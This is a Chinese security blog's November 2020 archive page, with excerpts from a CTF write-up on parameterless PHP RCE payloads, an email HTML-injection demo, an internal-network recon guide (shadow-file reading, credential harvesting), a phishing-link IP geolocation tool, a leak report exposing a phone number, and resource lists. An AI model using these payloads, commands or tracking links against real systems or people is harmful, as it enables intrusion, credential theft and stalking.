网站首页 • 发表在 2020年11月 的所有文章
-
网络安全与渗透测试工具集合
可能是总结的最全的开源渗透工具! 目录 入门指南 在线靶场 文件上传漏洞靶场 导航 payload 子域名枚举 自动爬虫实现的子域名收集工具 waf开源及规则 web应用扫描工具 webshell检测以及病毒分析 DDos防护 Android系列工具 XSS扫描 代码审计 端口扫描、指纹识别以及中间件扫描 高级持续性威胁(APT)相关工具 工控系统及大型网络相关安全工 模块化扫描、综合扫描器 内网安全渗透测试工具集 企业网络自检 弱口令或信息泄漏扫描 社工库 数据库防火墙 数据库扫描及注入 无线网络渗透审计 物联网设备扫描 针对性漏洞测试工具 LICENSE 入门指南 Web Hacking 101 中文版:https://wizardforcel.gitbooks.io/web-hacking-101/content/ 浅入浅出Android安全 中文版:https://wizardforcel.gitbooks.io/asani/content/ Android 渗透测试学习手册 中文版:https://wizardforcel.gitbooks.io/lpad/content/ Kali Linux Web渗透测试秘籍 中文版:https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Linux exploit 开发入门:https://github.com/hardenedlinux/linux-exploit-development-tutorial burpsuite实战指南:https://www.gitbook.com/book/t0data/burpsuite/details 渗透测试Node.js应用:http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 Web安全资料和资源列表:https://github.com/qazbnm456/awesome-web-security 安全维基百科:https://sec-wiki.com/sec-wiki 安全漏洞信息(精):https://ninjia.gitbook.io/secskill/Web 安全学习笔记(精):https://websec.readthedocs.io/zh/latest/ 黑客清单:https://github.com/sunnyelf/awesome-hacking 思维导图: https://github.com/phith0n/Mind-Map 思维导图:https://github.com/SecWiki/sec-chart 渗透超全面的渗透资料 ...
-
CTF|无参数RCE
在CTF竞赛过程中,我们时常会遇到一种类型的题,那就是无参数命令执行。接下来通过例题的形式针对无参数命令执行常见技巧和利用方式进行了总结。 01 示例一 <?php include"flag.php"; echo"flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) { @.eval($_GET['exp']); } else{ die("还差一点哦!"); } } else{ die("再好好想想!"); } } else{ die("还想读flag,臭弟弟!"); } }// highlight_file(__FILE__);?> 02 源码分析 利用GET方式传入exp参数; 代码中过滤了data/filter/php/phar伪协议,不能以伪协议形式直接读取文件; (?R)引用当前表达式,后面加了?递归调用。只允许执行类似a(b(c()))格式的无参数函数; 正则匹配还过滤了et/na/info等关键字,导致get()、phpinfo()等函数不能使用; eval($_GET[‘exp’]); 将输入的参数以php代码执行; 03 解题过程 查看当前目录下的文件,此处利用scandir()实现:print_r(scandir('.')); #表示获取当前目录下的文件; print_r(scandir('../')); #表示获取上一级目录下的文件; 于是,可以利用该函数,查看目标系统目录,寻找包含flag的文件位置。由于正则表达式限制,不能再scandir('.')函数中加入参数。故此处使用current(localeconv())表示“.”。其中localeconv()函数返回一包含本地数字及货币格式信息的数组,其中数组的第一项就是"."。current() 返回数组中的当前单元, 默认取第一个值。 http://127.0.0.1/ctf/web/web-5/index.php?exp=print_r(scandir(pos(localeconv()))); http://127.0.0.1/ctf/web/web-5/index.php?exp=print_r(scandir(current(localeconv()))); 接下来就要考虑如何读取flag,读取文件内容我们可以想到的函数有: file_get_contents() #把整个文件读入一个字符串中;file #把整个文件读入一个数组中;readfile() #读入一个文件并写入到输出缓冲;highlight_file() #对文件进行语法高亮显示;show_source() #对文件进行语法高亮显示; 刚刚列举的几个函数,都需要将要读取的文件作为参数进行读取操作,由于题中代码用正则表达式限制,不能接收参数,该如何将文件名写道函数里面,然后读取文件内容呢? 利用array_flip()函数将读取当前目录的键和值进行反转,然后读取其中的值即可获得flag.php; 其中的键可以利用随机数函数array_rand(),进行随机生成; http://127.0.0.1/ctf/web/web-5/index.php?exp=pprint_r(array_rand(array_flip(scandir(pos(localeconv()))))); 由上图可以看出,通过array_rand()能够随机出flag.php文件,然后利用readfile()函数,读取该文件: http://127.0.0.1/ctf/web/web-5/index.php?exp=readfile(array_rand(array_flip(scandir(pos(localeconv()))))); ...
-
微博|每日晒图第六届视角大赛开始
围观地址:https://weibo.com/6584869435/Jv7JTcfyI...
-
利用电子邮件中的HTML注入
HTMLi是一个在呈现HTML代码的任何应用程序中可利用的漏洞。电子邮件是其中之一。 本文的其余部分说明了如何通过目标上的注释通知功能将HTML注入电子邮件中。 Part 01 记得这里未讨论的HTML注入吗? 因此,在通知电子邮件中反映了comment和presentationTitle参数的值。 最初看起来如下: {"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"This is Redacted","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted Copy www.footstep.ninja","slideLocalId":"5p3nrib"}} 然后,在为参数注入presentationTitleHTML属性后,它看起来如下所示: {"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted\" <br/><br/> <div style='color:#1a3a69;line-height:1.5em;font-size:18px;text-align:center'>This is a test comment</div><br/> <a style='background-color:#f68270;border:1px solid #333333;border-color:#f68270;border-radius:6px;border-width:1px;color:#ffffff;display:inline-block;font-family:arial,helvetica,sans-serif;font-size:16px;font-weight:bold;letter-spacing:0px;line-height:16px;padding:12px 18px 12px 18px;text-align:center;text-decoration:none' href='https://footstep.ninja' target='_blank' data-saferedirecturl='https://footstep.ninja'>View Deck</a> <!-- Copy https://www.footstep.ninja","slideLocalId":"5p3nrib"}} Part 02 自然通知如下所示: Part 03 看起来像这样; 通过查看原始消息,我得到了确切的HTML:单击省略号,然后单击“显示原始” ...
-
IP地址精准查询
很多时候我们需要定位IP所在的物理位置,而这个工具可以直接到你家门口。 当前互联网的基石便是TCP/IP协议,而虚拟中的IP地址和现实中的地址往往难以对应,而这个站点,不但提供了IP地址所在的真实地址位置,还对该IP是否为真人用户使用的做出了猜测和标注,为IP的溯源和价值提供了参考依据。 关于IP定位,最早是通过运营商实现,每个运营商申请到的ip段,在某个范围内使用。因此早期只能是国家为单位的基础数据。对于比较大的国家,就进一步划分,比如,中国某通讯公司(不打广告),固定将某些ip分配某些机房使用,而这些机房则具备地域属性,因此就可以知道某些ip的位置是哪个省市区。再进一步,网上有种测算路由的方式进行定位,就是由大范围逐个跳转,跟踪路由。从而对比找出ip所在的小范围。 如今,网络铺设已经有个相当多的特性,比如: A.国内的某大运营商,ip资源够用,直接给用户分配公网ip。我以前就在这种网络下用动态域名工具玩过网站。 B.部分运营上为了缓解ip资源不足问题,某个大范围使用代理转发方式,给到用户的是私网ip,用户最终用代理的ip池的ip访问公网。 C.电话运营商,ip资源利用率过低,几乎是一个省份用一个ip池进行代理给用户的手机网络上网 随着大数据发展,有些公司做了大数据匿名收集数据,数据实时分析。因此可以将手机收集到的精准GPS数据和当前所用IP数据成对上报给后端服务器,运算过之后,就可以得出某个IP的分布范围数据。 误差说明: 对于上述A的情况,精确度可以达到几十米 对于上述B的情况,可能得覆盖一个城市的范围 对于上述C的情况,往往是一个省份的误差程度 因此,对于有线宽带用户,分配了相对固定的公网IP,用户在这个线路下有放置了wifi无线路由器,wifi下有接入了手机用户,手机里运行了服务,比如地图,或者地图SDK。其定位精度就可以达到几十米范围。对于这种数据,只有bat这种大头才能实现的了这个规模的数据手机,因此准确度几乎无法被超越,更大的互联网公司除外。 关于精准度问题,和其他家相比最大的优势就是钓鱼链接,使用钓鱼链接定位的位置可以直接到你家楼下,精度很高。如果对方刚刚重新获取公网IP,那可能精准度稍差,但这种情况并不是很常见。 钓鱼链接用起来也很简单,通过IM、邮箱等方式发送过去,对方一打开你提供的链接,你就能获取到对方的IP地址,还有相当详细的定位信息。使用生成Key功能,输入一个自己想要使用的Key,然后将生成的链接发送过去,就可以等着查看了。 需要的小伙伴在交流群内回复IP精准查询获取地址 ...
-
某信息平台敏感信息泄露
01 漏洞标题 某信息平台敏感信息泄露 02 漏洞类型 信息泄露 03 漏洞等级 高危 04 漏洞地址 http://www.xxxxx.org.cn/ 05 漏洞详情 信息平台敏感信息泄露,可以直接获取所有高级专家的所有手机号。 专家库具体某一专家信息查看,可以在URL处直接看到手机号。 0x01 访问 http://www.xxxx.org.cn/ExpertView.aspx?id=3&username=13926041501 0x02 批量可以看到每条信息都携带了用户的详细手机号信息。 http://www.xxxx.org.cn/ExpertsList.aspx 涉及到的专家信息共有700多条信息,包含完整的姓名和手机号。 06 漏洞危害 此处可以批量获取到的专家信息共有700多条信息,包含完整的姓名和手机号工作地点,被攻击者获取后可以定点钓鱼等,存在极大的安全风险。 07 建议措施 敏感信息做脱敏处理,不反回手机号等敏感信息。 PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负。 ...
-
如何进行内网信息收集
渗透测试的本质是信息收集,我们可以将内网信息收集大致分为5个步骤,即本机信息收集、域内信息收集、登录凭证窃取、存活主机探测、内网端口扫描。 最常见的两个问题就是: 我是谁?-- whoami我在哪?-- ipconfig/ifconfig 当获取一台主机的管理员权限的时候,我们总是迫不及待想要去深入了解一下。 本机信息收集 1.查询账户信息: 对当前主机的用户角色和用户权限做了解,判断是否需要进一步提升权限。 win:whoami、net user 用户名linux:whoami、id、cat /etc/shadow、cat /etc/passwd 2.查询网络和端口信息 根据目的主机的IP地址/网络连接/相关网络地址,确认所连接的网络情况。 win:ipconfig、netstat -ano ARP表:arp -a 路由表: route print 查看dns缓存记录命令:ipconfig/displaydns linux:ifconfig、netstat -anplt ARP表:arp -a / 路由表:route -n 查看登录日志获取登录来源ip 3.查询进程列表 查看本地运行的所有进程,确认本地软件运行情况,重点可以关注安全软件。 win:tasklist linux: ps、 top 4.查询系统和补丁信息 获取当前主机的系统版本和补丁更新情况,可用来辅助提升权限。 win:systeminfo,查询系统信息/补丁安装情况。 wmic qfe get Caption,description,HotfixID,installedOn //查询补丁信息,包含说明链接/补丁描述/KB编号/更新时间等信息 wmic qfe list full 查询全部信息 Linux: 通过查看内核版本 uname -a 或者使用rpm -qa来查询安装了哪些软件包 5.凭证收集 服务器端存有敏感信息,通过收集各种登录凭证以便扩大战果。 Windows:本地密码Hash和明文密码/抓取浏览器密码/服务端明文密码linux:history记录敏感操作/shadow文件破解/mimipenguin抓取密码/使用Strace收集登录凭证/全盘搜索敏感信息 域内信息收集 搜集完本机相关信息后,就需要判断当前主机是否在域内,如果在域内,就需要进一步收集域内信息 1.判断是否有域 一般域服务器都会同时作为时间服务器,所以使用下面命令判断主域 运行 net time /domain 该命令后,一般会有如下三种情况: 1.存在域,但当前用户不是域用户,提示说明权限不够 C:\Users>bypass>net time /domain 发生系统错误 5 拒绝访问。 2.存在域,并且当前用户是域用户 C:\Users\Administrator>net time /domain \\dc.test.com 的当前时间是 2020/10/23 21:18:37 命令成功完成。 3.当前网络环境为工作组,不存在域 C:\Users\Administrator>net time /domain 找不到域 WORKGROUP 的域控制器。 2.查找域管理员 net user /domain //获取域用户列表net group /domain //查询域内所有用户组列表net group “Domain Admins” /domain //查询域管理员用户net group "Domain Controllers" /domain //查看域控制器net localgroup administrators /domain //查询域内置本地管理员组用户 3.找到域控 一般来说,域控服务器IP地址为DNS服务器地址,找到DNS服务器地址就可以定位域控。 nslookup/ping 域名,解析到域控服务器IP地址 ...
-
暗网在出售最新的华住数据库
最近在暗网监测到有人在卖华住的数据库,出售者说数据是当年的一手数据,只卖过一个人,并且还附上了测试数据链接。 如果数据真实,极有可能是2018年8月份的那次,当时的数据囊括华住旗下汉庭、美爵、禧玥、漫心、诺富特、美居、CitiGo、桔子、全季、星程、宜必思、怡莱、海友等酒店。泄露的信息包括华住官网注册资料、酒店入住登记的身份信息及酒店开房记录,住客姓名、手机号、邮箱、身份证号、登录账号密码等。 这次数据表示全部资料共53G,1.23亿左右条记录。如果这份数据属实,并且被购买传播出去,又是一场风波了。下载地址是有的,但是不方便公布,请多包含啦!...
-
请武装您的BURP
+--- books | +--- Burp Suite使用 _ Pa55w0rd 's Blog.pdf | +--- Burp Suite使用中的一些技巧.pdf | +--- burp 日志插件「burplogger++.jar」从原理到实践-信安之路.pdf | +--- BurpSuite 代理设置的小技巧.pdf | +--- burpsuite实战指南.pdf | +--- Configuring Burp Suite with Android Nougat.pdf | +--- IOS之Burpsuite抓Https问题.pdf | +--- nmap-man-page.pdf | +--- Nmap渗透测试思维导图.png | +--- readme.md | +--- 利用Burpsuite爆破Tomcat密码.pdf | +--- 利用burp插件Hackvertor绕过waf并破解XOR加密 - 嘶吼 RoarTalk.pdf | +--- 基于BurpSuite快速探测越权-Authz插件.pdf | +--- 如何在64位Windows 10下安装java开发环境.pdf | +--- 新手福利 _ Burpsuite你可能不知道的技巧.pdf | +--- 本地文件包含漏洞检测工具 – Burp国产插件LFI scanner checks.pdf | +--- 配置Frida+BurpSuite+Genymotion, 绕过Android SSL Pinning-Configuring Frida with BurpSuite and Genymotion to bypass SSL Pinning.pdf +--- BurpSuiteCn.jar +--- Burp_start.bat +--- Burp_start_en.bat +--- cn.txt +--- Create-Desktop-Link.bat +--- GitZip-for-github_v0.3.1.crx +--- img | +--- ANSI.png | +--- crack1.png | +--- crack2.png | +--- crack3.png | +--- crack4.png | +--- crack5.png | +--- crack_ok.png | +--- CRLF_ANSI.png | +--- desktop_shortlink.png | +--- Goescat-Macaron-Burp-suite.ico | +--- hackbar.gif | +--- issues-example.png | +--- issues-example2.png | +--- passive-scan-client-0.1-jar-with-dependencies.gif | +--- ShellPass.png | +--- u2cTab.png | +--- 登上GitHub的trending截图纪念.png +--- Mrxn's Blog.url +--- plugins | +--- awesome-burp-extensions | | +--- README.md | +--- burp-vulners-scanner-1.2.jar | +--- burp-requests.jar | +--- bypasswaf.jar | +--- chunked-coding-converter.0.2.1.jar | +--- domain_hunter-v1.4.jar | +--- HackBar.jar | +--- http-request-smuggler-all.jar | +--- httpsmuggler.jar | +--- J2EEScan-2.0.0-beta-jar-with-dependencies.jar | +--- jsEncrypter.0.3 | | +--- jsEncrypter-0.3.jar | | +--- jsEncrypter_readme.pdf | | +--- nodejs_server.js | | +--- phantomjs_server.js | | +--- README.md | | +--- 对登录中账号密码进行加密之后再传输的爆破的思路和方式 - FreeBuf互联网安全新媒体平台.pdf | | +--- 编写加密传输爆破插件jsEncrypter _ 回忆飘如雪.pdf | +--- knife-v1.7.jar | +--- LFI scanner checks.jar | +--- LoggerPlusPlus.jar | +--- passive-scan-client-0.1-jar-with-dependencies.jar | +--- Readme.md | +--- reCAPTCHA-v0.9.jar | +--- sqlmap.jar | +--- sqlmap4burp++.0.2.jar | +--- WooyunSearch-1.0-SNAPSHOT-jar-with-dependencies.jar | +--- shiroPoc-0.5-SNAPSHOT-jar-with-dependencies.jar +--- README.md +--- 创建桌面快捷方式.bat +--- 创建桌面快捷方式.zip +--- 常见shell大小马密码.md +--- 渗透测试面试问题2019版.md 一些BURP的插件合集 https://github.com/Mr-xn/BurpSuite-collections ...
-
这个知识有点冷:为什么交通银行商标用繁体字
有没有人注意过,为什么“交通银行”标志那四个字是繁体字呢?按照商标法规定,只有建国前就成立的老字号才允许用繁体字,新企业必须用简体字。 今天要讲的故事就是海峡两岸的两个交通银行。为了叙述方便,我们管咱这边的叫上海交通银行,管海峡那边的叫台湾交通银行——俩省部级单位,很对等。 台湾交通银行是民国四大银行之一,跟着蒋公一起逃到台湾了。新中国成立以后,人民银行收编了所有的银行,央行商行一肩挑,一直到改革开放才开始重新设立商业银行。90年那会,工农中建四大行已经有了,为了走出一条新路,在上海成立了新中国第一家股份制银行。 新银行也想有个历史悠久的老招牌嘛。民国之前是票号,没法用。查了查民国时期四大行:中央银行、中国银行、中国农民银行和交通银行。央行不敢叫,中国银行还在,农民银行和农业银行冲突,于是就直接叫交通银行,而且是恢复组建。当然这事没和海峡对面的台湾交通银行商量。 上海交通银行开始做国际业务以后,洋人们崩溃了,怎么两个一模一样的交通银行呀,名字、英文简称、标志全一样!很多国际汇款直接寄错了地方。台湾交通银行很气愤,我从1908年经营到现在,怎么突然又冒出另一家跟我一样的。申请国际仲裁! 万万没想到,洋人认死理啊!人家不看你是不是一直营业,只看你有没有成立时候的文件资料。台湾交通银行傻眼了,蒋公南逃的时候只顾带金子,没带档案!上海交通银行很开心,悠哉悠哉地来到南京市第一档案馆,原国民政府中央档案馆,拿出了交通银行成立时的全套资料,你看,我们是恢复组建的正宗交通银行呀。 台湾交通银行彻底崩溃了,羞愧地改了名字,业务一蹶不振,没过几年就和其它银行合并了事。上海交通银行则是一路高歌猛进,并且在2008年庆祝了“百年交行”,稳居我国第五大银行。 看见没,档案比黄金更重要! ...
-
值得珍藏|红队资源
现如今,网络安全是近几年非常火热的一个行业,对于打算从事或入门网络安全不久的朋友来说,一直处于求学无门、无从下手的状态。为此小编将贝塔安全实验室成员分享的一些靶场环境、红队资源等个大家进行了总结,希望大家能好好利用,快速提升自己的技术水平! 01 红队资源 1.红队资料集锦:https://www.lshack.cn/772/2.AD攻击防御:https://github.com/infosecn1nja/AD-Attack-Defense3.优秀红队资源:https://github.com/yeyintminthuhtut/Awesome-Red-Teaming4.零租资料库:https://wiki.0-sec.org/#/md5.Micro8高级攻防:https://github.com/Micropoor/Micro86.红队常用命令:https://github.com/foobarto/redteam-notebook 7.APT笔记:https://github.com/kbandla/APTnotes8.渗透测试笔记:https://github.com/Techlord-RCE/Penetration-Testing9.web渗透笔记:https://github.com/qazbnm456/awesome-web-security 01 蓝队资源 1.蓝队资源集锦:https://github.com/fabacab/awesome-cybersecurity-blueteam2.攻防思维导图:https://github.com/SecWiki/sec-chart3.AWS安全检测:https://github.com/stuhirst/awssecurity/blob/master/arsenal.md4.AWS安全工具:https://github.com/toniblyx/my-arsenal-of-aws-security-tools5.GitHub监控工具:https://github.com/0xbug/Hawkeye6. github信息监测:https://github.com/Hell0W0rld0/Github-Hunter7.服务器安全管理平台:https://github.com/chaitin/cloudwalker8.评估工具:https://github.com/guardicore/monkey9.企业安全管理平台:https://github.com/zhaoweiho/SecurityManageFramwork 01 开源漏洞库 1.乌云漏洞详情文章:https://wooyun.kieran.top2.同程安全公开漏洞:https://sec.ly.com/bugs 3.中国国家工控漏洞库:http://ics.cnvd.org.cn 4.美国国家工控漏洞库:https://ics-cert.us-cert.gov/advisories 5.绿盟漏洞库:http://www.nsfocus.net/index.php?act=sec_bug 6.威努特工控漏洞库:http://ivd.winicssec.com/ 7.CVE中文工控漏洞库:http://cve.scap.org.cn/view/ics 8.美国Offensive Security的漏洞库:https://www.exploit-db.com 9.美国国家信息安全漏洞库:https://nvd.nist.gov/vuln/search 01 练习靶场 1.124个Hacking技术的网站:https://www.blackmoreops.com/2018/11/06/124-legal-hacking-websites-to-practice-and-learn/2.vulnhub: https://www.vulnhub.com3.世界知名ctf交流网站: https://www.wechall.net4.谷歌XSS挑战:https://www.xssgame.com5.在线靶场挑战:https://www.hackthebox.eu6.vulstudy:https://github.com/c0ny1/vulstudy7.多种漏洞复现系统:https://github.com/bkimminich/juice-shop8.sql注入:https://github.com/Audi-1/sqli-labs9.红日靶场:http://vulnstack.qiyuanxuetang.net/vuln/ ...
-
突发:宝塔公司全体员工疑似被警察带走
宝塔Linux面板是提升运维效率的服务器管理软件,支持一键LAMP/LNMP/集群/监控/网站/FTP/数据库/JAVA等100多项服务器管理功能。公司有30个人的专业团队研发及维护,经过200多个版本的迭代,功能全,少出错且足够安全,已获得全球百万用户认可安装。 今天在直播间,大家突然听到疑似警察的声音:“双手抱头,蹲下!” 然后各种方式无法和宝塔公司取得联系,截至发稿时间,没有任何消息,各个IT运维群已经炸锅。后续情况未名。 ...